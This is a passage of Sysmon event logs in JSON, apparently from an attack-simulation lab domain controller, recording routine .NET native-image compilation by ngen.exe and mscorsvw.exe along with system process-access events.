(x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9075,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:32.076\r\nProcessGuid: {E2A3D6B1-13C3-5F25-0000-001085911100}\r\nProcessId: 2616\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\a38-0\\System.ServiceProcess.dll\r\nCreationUtcTime: 2020-08-01 07:03:32.076","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:32.076","ProcessGuid":"{E2A3D6B1-13C3-5F25-0000-001085911100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\a38-0\\System.ServiceProcess.dll","CreationUtcTime":"2020-08-01 07:03:32.076","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9076,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.107\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A8-5F25-0000-00104E351100}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.107","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A8-5F25-0000-00104E351100}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9077,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.107\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A8-5F25-0000-00104E351100}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.107","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A8-5F25-0000-00104E351100}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9078,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.122\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-001090951100}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.122","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-001090951100}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9079,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.169\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-001017991100}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.169","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-001017991100}","TargetProcessId":"2180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9080,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.169\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-001017991100}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.169","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-001017991100}","TargetProcessId":"2180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9081,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.185\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-001017991100}\r\nTargetProcessId: 2180\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.185","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-001017991100}","TargetProcessId":"2180","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9082,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:32.685\r\nProcessGuid: {E2A3D6B1-13C4-5F25-0000-001017991100}\r\nProcessId: 2180\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\884-0\\System.Management.dll\r\nCreationUtcTime: 2020-08-01 07:03:32.685","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:32.685","ProcessGuid":"{E2A3D6B1-13C4-5F25-0000-001017991100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\884-0\\System.Management.dll","CreationUtcTime":"2020-08-01 07:03:32.685","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9083,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.732\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-0010BD9C1100}\r\nTargetProcessId: 4992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed 